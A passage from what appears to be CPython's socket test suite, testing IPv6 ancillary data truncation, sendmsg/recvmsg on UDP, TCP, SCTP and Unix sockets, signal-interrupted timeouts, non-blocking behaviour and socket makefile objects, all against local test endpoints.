def _testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSetTrafficClassAndHopLimit(self):
# Test setting traffic class and hop limit on outgoing packet,
# and receiving them at the other end.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testSetTrafficClassAndHopLimit.client_skip
def _testSetTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testOddCmsgSize(self):
# Try to send ancillary data with first item one byte too
# long. Fall back to sending with correct size if this fails,
# and check that second item was handled correctly.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testOddCmsgSize.client_skip
def _testOddCmsgSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
try:
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class]).tobytes() + b"\x00"),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
except OSError as e:
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
self.assertEqual(nbytes, len(MSG))
# Tests for proper handling of truncated ancillary data
def checkHopLimitTruncatedHeader(self, ancbufsize, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space, which should be too small to contain the ancillary
# data header (if ancbufsize is None, pass no second argument
# to recvmsg()). Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and no ancillary data is
# returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
args = () if ancbufsize is None else (ancbufsize,)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), *args)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no ancillary
# buffer size is provided.
self.checkHopLimitTruncatedHeader(ancbufsize=None,
# BSD seems to set
# MSG_CTRUNC only if an item
# has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
@testCmsgTruncNoBufSize.client_skip
def _testCmsgTruncNoBufSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc0(self):
# Check that no ancillary data is received when ancillary
# buffer size is zero.
self.checkHopLimitTruncatedHeader(ancbufsize=0,
ignoreflags=socket.MSG_CTRUNC)
@testSingleCmsgTrunc0.client_skip
def _testSingleCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=1)
@testSingleCmsgTrunc1.client_skip
def _testSingleCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc2Int(self):
self.checkHopLimitTruncatedHeader(ancbufsize=2 * SIZEOF_INT)
@testSingleCmsgTrunc2Int.client_skip
def _testSingleCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncLen0Minus1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=socket.CMSG_LEN(0) - 1)
@testSingleCmsgTruncLen0Minus1.client_skip
def _testSingleCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncInData(self):
# Test truncation of a control message inside its associated
# data. The message may be returned with its data truncated,
# or not returned at all.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG), socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertLess(len(cmsg_data), SIZEOF_INT)
@testSingleCmsgTruncInData.client_skip
def _testSingleCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
def checkTruncatedSecondHeader(self, ancbufsize, ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space, which should be large enough to
# contain the first item, but too small to contain the header
# of the second. Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and only one ancillary
# data item is returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertIn(cmsg_type, {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT})
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
# Try the above test with various buffer sizes.
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc0(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT),
ignoreflags=socket.MSG_CTRUNC)
@testSecondCmsgTrunc0.client_skip
def _testSecondCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) + 1)
@testSecondCmsgTrunc1.client_skip
def _testSecondCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc2Int(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
2 * SIZEOF_INT)
@testSecondCmsgTrunc2Int.client_skip
def _testSecondCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTruncLen0Minus1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(0) - 1)
@testSecondCmsgTruncLen0Minus1.client_skip
def _testSecondCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecomdCmsgTruncInData(self):
# Test truncation of the second of two control messages inside
# its associated data.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) + socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
cmsg_types = {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT}
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertLess(len(cmsg_data), SIZEOF_INT)
self.assertEqual(ancdata, [])
@testSecomdCmsgTruncInData.client_skip
def _testSecomdCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Derive concrete test classes for different socket types.
class SendrecvmsgUDPTestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
class SendmsgUDPTest(SendmsgConnectionlessTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgUDPTest(RecvmsgTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoUDPTest(RecvmsgIntoTests, SendrecvmsgUDPTestBase):
pass
class SendrecvmsgUDP6TestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDP6TestBase):
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer, ignoring scope ID
self.assertEqual(addr1[:-1], addr2[:-1])
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class SendmsgUDP6Test(SendmsgConnectionlessTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgUDP6Test(RecvmsgTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoUDP6Test(RecvmsgIntoTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgRFC3542AncillaryUDP6Test(RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoRFC3542AncillaryUDP6Test(RecvmsgIntoMixin,
RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
class SendrecvmsgTCPTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, TCPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
class SendmsgTCPTest(SendmsgStreamTests, SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgTCPTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoTCPTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
class SendrecvmsgSCTPStreamTestBase(SendrecvmsgSCTPFlagsBase,
SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, SCTPStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipIf(AIX, "IPPROTO_SCTP: [Errno 62] Protocol not supported on AIX")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class SendmsgSCTPStreamTest(SendmsgStreamTests, SendrecvmsgSCTPStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipIf(AIX, "IPPROTO_SCTP: [Errno 62] Protocol not supported on AIX")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class RecvmsgSCTPStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipIf(AIX, "IPPROTO_SCTP: [Errno 62] Protocol not supported on AIX")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class RecvmsgIntoSCTPStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgIntoSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
class SendrecvmsgUnixStreamTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, UnixStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "AF_UNIX")
class SendmsgUnixStreamTest(SendmsgStreamTests, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@requireAttrs(socket, "AF_UNIX")
class RecvmsgUnixStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@requireAttrs(socket, "AF_UNIX")
class RecvmsgIntoUnixStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
class RecvmsgSCMRightsStreamTest(SCMRightsTest, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg_into")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
class RecvmsgIntoSCMRightsStreamTest(RecvmsgIntoMixin, SCMRightsTest,
SendrecvmsgUnixStreamTestBase):
pass
# Test interrupting the interruptible send/receive methods with a
# signal when a timeout is set. These tests avoid having multiple
# threads alive during the test so that the OS cannot deliver the
# signal to the wrong one.
class InterruptedTimeoutBase(unittest.TestCase):
# Base class for interrupted send/receive tests. Installs an
# empty handler for SIGALRM and removes it on teardown, along with
# any scheduled alarms.
def setUp(self):
super().setUp()
orig_alrm_handler = signal.signal(signal.SIGALRM,
lambda signum, frame: 1 / 0)
self.addCleanup(signal.signal, signal.SIGALRM, orig_alrm_handler)
# Timeout for socket operations
timeout = 4.0
# Provide setAlarm() method to schedule delivery of SIGALRM after
# given number of seconds, or cancel it if zero, and an
# appropriate time value to use. Use setitimer() if available.
if hasattr(signal, "setitimer"):
alarm_time = 0.05
def setAlarm(self, seconds):
signal.setitimer(signal.ITIMER_REAL, seconds)
else:
# Old systems may deliver the alarm up to one second early
alarm_time = 2
def setAlarm(self, seconds):
signal.alarm(seconds)
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedRecvTimeoutTest(InterruptedTimeoutBase, UDPTestBase):
# Test interrupting the recv*() methods with signals when a
# timeout is set.
def setUp(self):
super().setUp()
self.serv.settimeout(self.timeout)
def checkInterruptedRecv(self, func, *args, **kwargs):
# Check that func(*args, **kwargs) raises
# errno of EINTR when interrupted by a signal.
try:
self.setAlarm(self.alarm_time)
with self.assertRaises(ZeroDivisionError) as cm:
func(*args, **kwargs)
finally:
self.setAlarm(0)
def testInterruptedRecvTimeout(self):
self.checkInterruptedRecv(self.serv.recv, 1024)
def testInterruptedRecvIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recv_into, bytearray(1024))
def testInterruptedRecvfromTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom, 1024)
def testInterruptedRecvfromIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom_into, bytearray(1024))
@requireAttrs(socket.socket, "recvmsg")
def testInterruptedRecvmsgTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg, 1024)
@requireAttrs(socket.socket, "recvmsg_into")
def testInterruptedRecvmsgIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg_into, [bytearray(1024)])
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedSendTimeoutTest(InterruptedTimeoutBase,
ThreadSafeCleanupTestCase,
SocketListeningTestMixin, TCPTestBase):
# Test interrupting the interruptible send*() methods with signals
# when a timeout is set.
def setUp(self):
super().setUp()
self.serv_conn = self.newSocket()
self.addCleanup(self.serv_conn.close)
# Use a thread to complete the connection, but wait for it to
# terminate before running the test, so that there is only one
# thread to accept the signal.
cli_thread = threading.Thread(target=self.doConnect)
cli_thread.start()
self.cli_conn, addr = self.serv.accept()
self.addCleanup(self.cli_conn.close)
cli_thread.join()
self.serv_conn.settimeout(self.timeout)
def doConnect(self):
self.serv_conn.connect(self.serv_addr)
def checkInterruptedSend(self, func, *args, **kwargs):
# Check that func(*args, **kwargs), run in a loop, raises
# OSError with an errno of EINTR when interrupted by a
# signal.
try:
with self.assertRaises(ZeroDivisionError) as cm:
while True:
self.setAlarm(self.alarm_time)
func(*args, **kwargs)
finally:
self.setAlarm(0)
# Issue #12958: The following tests have problems on OS X prior to 10.7
@support.requires_mac_ver(10, 7)
def testInterruptedSendTimeout(self):
self.checkInterruptedSend(self.serv_conn.send, b"a"*512)
@support.requires_mac_ver(10, 7)
def testInterruptedSendtoTimeout(self):
# Passing an actual address here as Python's wrapper for
# sendto() doesn't allow passing a zero-length one; POSIX
# requires that the address is ignored since the socket is
# connection-mode, however.
self.checkInterruptedSend(self.serv_conn.sendto, b"a"*512,
self.serv_addr)
@support.requires_mac_ver(10, 7)
@requireAttrs(socket.socket, "sendmsg")
def testInterruptedSendmsgTimeout(self):
self.checkInterruptedSend(self.serv_conn.sendmsg, [b"a"*512])
class TCPCloserTest(ThreadedTCPSocketTest):
def testClose(self):
conn, addr = self.serv.accept()
conn.close()
sd = self.cli
read, write, err = select.select([sd], [], [], 1.0)
self.assertEqual(read, [sd])
self.assertEqual(sd.recv(1), b'')
# Calling close() many times should be safe.
conn.close()
conn.close()
def _testClose(self):
self.cli.connect((HOST, self.port))
time.sleep(1.0)
class BasicSocketPairTest(SocketPairTest):
def __init__(self, methodName='runTest'):
SocketPairTest.__init__(self, methodName=methodName)
def _check_defaults(self, sock):
self.assertIsInstance(sock, socket.socket)
if hasattr(socket, 'AF_UNIX'):
self.assertEqual(sock.family, socket.AF_UNIX)
else:
self.assertEqual(sock.family, socket.AF_INET)
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
def _testDefaults(self):
self._check_defaults(self.cli)
def testDefaults(self):
self._check_defaults(self.serv)
def testRecv(self):
msg = self.serv.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.cli.send(MSG)
def testSend(self):
self.serv.send(MSG)
def _testSend(self):
msg = self.cli.recv(1024)
self.assertEqual(msg, MSG)
@unittest.skipIf(sys.platform == 'OpenVMS', 'OpenVMS blocking fails')
class NonBlockingTCPTests(ThreadedTCPSocketTest):
def __init__(self, methodName='runTest'):
self.event = threading.Event()
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def assert_sock_timeout(self, sock, timeout):
self.assertEqual(self.serv.gettimeout(), timeout)
blocking = (timeout != 0.0)
self.assertEqual(sock.getblocking(), blocking)
if fcntl is not None:
# When a Python socket has a non-zero timeout, it's switched
# internally to a non-blocking mode. Later, sock.sendall(),
# sock.recv(), and other socket operations use a select() call and
# handle EWOULDBLOCK/EGAIN on all socket operations. That's how
# timeouts are enforced.
fd_blocking = (timeout is None)
flag = fcntl.fcntl(sock, fcntl.F_GETFL, os.O_NONBLOCK)
self.assertEqual(not bool(flag & os.O_NONBLOCK), fd_blocking)
def testSetBlocking(self):
# Test setblocking() and settimeout() methods
self.serv.setblocking(True)
self.assert_sock_timeout(self.serv, None)
self.serv.setblocking(False)
self.assert_sock_timeout(self.serv, 0.0)
self.serv.settimeout(None)
self.assert_sock_timeout(self.serv, None)
self.serv.settimeout(0)
self.assert_sock_timeout(self.serv, 0)
self.serv.settimeout(10)
self.assert_sock_timeout(self.serv, 10)
self.serv.settimeout(0)
self.assert_sock_timeout(self.serv, 0)
def _testSetBlocking(self):
pass
@support.cpython_only
def testSetBlocking_overflow(self):
# Issue 15989
import _testcapi
if _testcapi.UINT_MAX >= _testcapi.ULONG_MAX:
self.skipTest('needs UINT_MAX < ULONG_MAX')
self.serv.setblocking(False)
self.assertEqual(self.serv.gettimeout(), 0.0)
self.serv.setblocking(_testcapi.UINT_MAX + 1)
self.assertIsNone(self.serv.gettimeout())
_testSetBlocking_overflow = support.cpython_only(_testSetBlocking)
@unittest.skipUnless(hasattr(socket, 'SOCK_NONBLOCK'),
'test needs socket.SOCK_NONBLOCK')
@support.requires_linux_version(2, 6, 28)
def testInitNonBlocking(self):
# create a socket with SOCK_NONBLOCK
self.serv.close()
self.serv = socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_NONBLOCK)
self.assert_sock_timeout(self.serv, 0)
def _testInitNonBlocking(self):
pass
def testInheritFlagsBlocking(self):
# bpo-7995: accept() on a listening socket with a timeout and the
# default timeout is None, the resulting socket must be blocking.
with socket_setdefaulttimeout(None):
self.serv.settimeout(10)
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
self.assertIsNone(conn.gettimeout())
def _testInheritFlagsBlocking(self):
self.cli.connect((HOST, self.port))
def testInheritFlagsTimeout(self):
# bpo-7995: accept() on a listening socket with a timeout and the
# default timeout is None, the resulting socket must inherit
# the default timeout.
default_timeout = 20.0
with socket_setdefaulttimeout(default_timeout):
self.serv.settimeout(10)
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
self.assertEqual(conn.gettimeout(), default_timeout)
def _testInheritFlagsTimeout(self):
self.cli.connect((HOST, self.port))
def testAccept(self):
# Testing non-blocking accept
self.serv.setblocking(0)
# connect() didn't start: non-blocking accept() fails
start_time = time.monotonic()
with self.assertRaises(BlockingIOError):
conn, addr = self.serv.accept()
dt = time.monotonic() - start_time
self.assertLess(dt, 1.0)
self.event.set()
read, write, err = select.select([self.serv], [], [], MAIN_TIMEOUT)
if self.serv not in read:
self.fail("Error trying to do accept after select.")
# connect() completed: non-blocking accept() doesn't block
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
self.assertIsNone(conn.gettimeout())
def _testAccept(self):
# don't connect before event is set to check
# that non-blocking accept() raises BlockingIOError
self.event.wait()
self.cli.connect((HOST, self.port))
def testRecv(self):
# Testing non-blocking recv
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
conn.setblocking(0)
# the server didn't send data yet: non-blocking recv() fails
with self.assertRaises(BlockingIOError):
msg = conn.recv(len(MSG))
self.event.set()
read, write, err = select.select([conn], [], [], MAIN_TIMEOUT)
if conn not in read:
self.fail("Error during select call to non-blocking socket.")
# the server sent data yet: non-blocking recv() doesn't block
msg = conn.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testRecv(self):
self.cli.connect((HOST, self.port))
# don't send anything before event is set to check
# that non-blocking recv() raises BlockingIOError
self.event.wait()
# send data: recv() will no longer block
self.cli.sendall(MSG)
class FileObjectClassTestCase(SocketConnectedTest):
"""Unit tests for the object returned by socket.makefile()
self.read_file is the io object returned by makefile() on
the client connection. You can read from this file to
get output from the server.
self.write_file is the io object returned by makefile() on the
server connection. You can write to this file to send output
to the client.
"""
bufsize = -1 # Use default buffer size
encoding = 'utf-8'
errors = 'strict'
newline = None
read_mode = 'rb'
read_msg = MSG
write_mode = 'wb'
write_msg = MSG
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def setUp(self):
self.evt1, self.evt2, self.serv_finished, self.cli_finished = [
threading.Event() for i in range(4)]
SocketConnectedTest.setUp(self)
self.read_file = self.cli_conn.makefile(
self.read_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def tearDown(self):
self.serv_finished.set()
self.read_file.close()
self.assertTrue(self.read_file.closed)
self.read_file = None
SocketConnectedTest.tearDown(self)
def clientSetUp(self):
SocketConnectedTest.clientSetUp(self)
self.write_file = self.serv_conn.makefile(
self.write_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def clientTearDown(self):
self.cli_finished.set()
self.write_file.close()
self.assertTrue(self.write_file.closed)
self.write_file = None
SocketConnectedTest.clientTearDown(self)
def testReadAfterTimeout(self):
# Issue #7322: A file object must disallow further reads
# after a timeout has occurred.
self.cli_conn.settimeout(1)
self.read_file.read(3)
# First read raises a timeout
self.assertRaises(socket.timeout, self.read_file.read, 1)
# Second read is disallowed
with self.assertRaises(OSError) as ctx:
self.read_file.read(1)
self.assertIn("cannot read from timed out object", str(ctx.exception))
def _testReadAfterTimeout(self):
self.write_file.write(self.write_msg[0:3])
self.write_file.flush()
self.serv_finished.wait()
def testSmallRead(self):
# Performing small file read test
first_seg = self.read_file.read(len(self.read_msg)-3)
second_seg = self.read_file.read(3)
msg = first_seg + second_seg
self.assertEqual(msg, self.read_msg)
def _testSmallRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testFullRead(self):
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testFullRead(self):
self.write_file.write(self.write_msg)
self.write_file.close()
def testUnbufferedRead(self):
# Performing unbuffered file read test
buf = type(self.read_msg)()
while 1:
char = self.read_file.read(1)
if not char:
break
buf += char
self.assertEqual(buf, self.read_msg)
def _testUnbufferedRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testReadline(self):
# Performing file readline test
line = self.read_file.readline()
self.assertEqual(line, self.read_msg)
def _testReadline(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testCloseAfterMakefile(self):
# The file returned by makefile should keep the socket open.
self.cli_conn.close()
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testCloseAfterMakefile(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileAfterMakefileClose(self):
self.read_file.close()
msg = self.cli_conn.recv(len(MSG))
if isinstance(self.read_msg, str):
msg = msg.decode()
self.assertEqual(msg, self.read_msg)
def _testMakefileAfterMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testClosedAttr(self):
self.assertTrue(not self.read_file.closed)
def _testClosedAttr(self):
self.assertTrue(not self.write_file.closed)
def testAttributes(self):
